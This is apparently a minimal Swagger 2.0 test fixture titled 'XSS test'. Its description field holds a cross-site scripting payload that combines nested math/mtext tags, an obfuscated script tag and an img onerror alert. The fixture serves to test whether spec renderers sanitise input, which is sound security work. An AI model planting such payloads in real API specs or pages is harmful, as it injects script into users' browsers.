swagger: '2.0'
info:
  title: XSS test
  description: <math><mtext><h1><a><h6></a></h6>"""&lt;ScriPT&gt;<img src="x" onerror="alert('XSS');">
                                              
  
 

                
  version: production
